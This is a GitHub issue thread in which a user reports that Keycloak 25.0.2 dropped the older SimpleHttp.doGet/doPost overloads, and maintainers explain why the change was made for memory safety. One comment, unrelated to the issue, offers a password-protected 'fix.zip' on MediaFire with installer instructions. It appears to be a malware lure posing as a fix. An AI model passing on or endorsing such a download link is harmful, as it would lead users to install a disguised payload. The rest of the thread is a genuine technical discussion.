### ISSUE TITLE
SimpleHttp.doGet and SimpleHttp.doPost APIs of Keycloak version 25.0.2 are not backward compatible

### ISSUE THREAD

**Issue by atul-epam** [keycloak/keycloak#32383]
### Before reporting an issue

- [X] I have read and understood the above terms for submitting issues, and I understand that my issue may be closed without action if I do not follow them.

### Area

account/api

### Describe the bug

SimpleHttp.doGet and SimpleHttp.doPost APIs in keycloak v24.0.2 were having 2 overloaded methods, one with keycloakSession and other with httpclient along with url as method parameters. Please refer below link:
https://www.keycloak.org/docs-api/24.0.2/javadocs/org/keycloak/broker/provider/util/SimpleHttp.html#doGet(java.lang.String,org.apache.http.client.HttpClient)

But in version 25.0.2, following methods are introduced:

protected static SimpleHttp doPost(String url,
 org.apache.http.client.HttpClient client,
 **long maxConsumedResponseSize**)

protected static SimpleHttp doGet(String url,
 org.apache.http.client.HttpClient client,
 **long maxConsumedResponseSize)**

https://www.keycloak.org/docs-api/25.0.2/javadocs/org/keycloak/broker/provider/util/SimpleHttp.html#doGet(java.lang.String,org.apache.http.client.HttpClient,long)

**This is breaking existing functionality when we are trying to upgrade from version 24.0.2 to 25.0.2.** The API should be backward compatible. We should introduce new API in such a way that it does not break existing code. 

**New API is having additional parameter maxConsumedResponseSize, but existing code is calling these APIs without this parameter. Old APIs without this parameter are completely removed. We should keep the old APIs, so that existing code works without any issues.**

### Version

25.0.2

### Regression

- [ ] The issue is a regression

### Expected behavior

SimpleHttp.doGet and SimpleHttp.doPost APIs should work fine with the existing code when upgrading to version 25.0.2

### Actual behavior

SimpleHttp.doGet and SimpleHttp.doPost APIs are breaking

### How to Reproduce?

Upgrade to version 25.0.2 from 24.0.2 where we are already using SimpleHttp.doGet and SimpleHttp.doPost APIs with httpClient parameter.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by atul-epam** [comment]
Can anyone please respond to this?

**Comment by atul-epam** [comment]
I am not sure why no one is responding to this. I have raised some issues in past few months also but I am not getting any response from keycloak team.

**Comment by sschu** [comment]
Looking at https://github.com/keycloak/keycloak/issues/30302, I think that change was intended. As @ahus1 said, this is in server-spi-private so not guaranteed to be stable between versions. Is there any specific reason you could not migrate to the public version using the KeycloakSession as parameter?

**Comment by atul-epam** [comment]
@sschu @ahus1 
I can migrate to public version using KeycloakSession but the point is that for our customers who wants to upgrade to keycloak version 25 but they don't have access to modify the customized keycloak code that is provided by us, then it breaks.

Ideally, version upgrade should not break the code and any change in java API should be backward compatible. Do you agree?

**Comment by sschu** [comment]
As I said, stuff in server-spi-private is not guaranteed to be stable, only stuff in server-spi is. This is intentional. So if you use something from server-spi-private, you should be aware of the risk that something breaks.

**Comment by ahus1** [comment]
@atul-epam - I see you are upgrading from one major version to another major version, which might incur breaking changes due to the nature of major upgrade. 

For public APIs which reside in `server-spi` we try to do backward compatible changes, for those in modules `server-spi-private` this is done on a best effort basis. 

In this case, the old methods were unsafe to be called, as a malicious server could send a lot of content which could lead to an out-of-memory problem. Due to this, there is now this API change so that no-one calls these unsafe methods. 

There is an outstanding request to create a HTTP client that would be available in the public packages that will then be more stable.

**Comment by atul-epam** [comment]
Thanks @ahus1 @sschu I am satisfied with your response. Can you please answer few of my queries:

- "There is an outstanding request to create a HTTP client that would be available in the public packages that will then be more stable." Do you mean, we will be having more APIs that will do same operation as doGet and doPost does and will be available in upcoming releases? If yes, when and in which package?

- Do we have any other alternate of doGet and doPost in any other package which is more stable and can be used with version 25.0.2?

**Comment by ahus1** [comment]
>  Do you mean, we will be having more APIs that will do same operation as doGet and doPost does and will be available in upcoming releases?

This is the plan

> If yes, when and in which package?

Not defined yet, but it will not be a "-private" module. 

> Do we have any other alternate of doGet and doPost in any other package which is more stable and can be used with version 25.0.2?

Keycloak doesn't provide any API here. You can use a transitive dependency of Keycloak and roll your own, still I assume there would be other problems as those transitive dependencies can change without notice. You can include a 3rd party dependency and relocate those classes into a new Java package space that you own. 

So, using the `SimpleHttp` still seems to be a reasonable good option although it might change for a release.
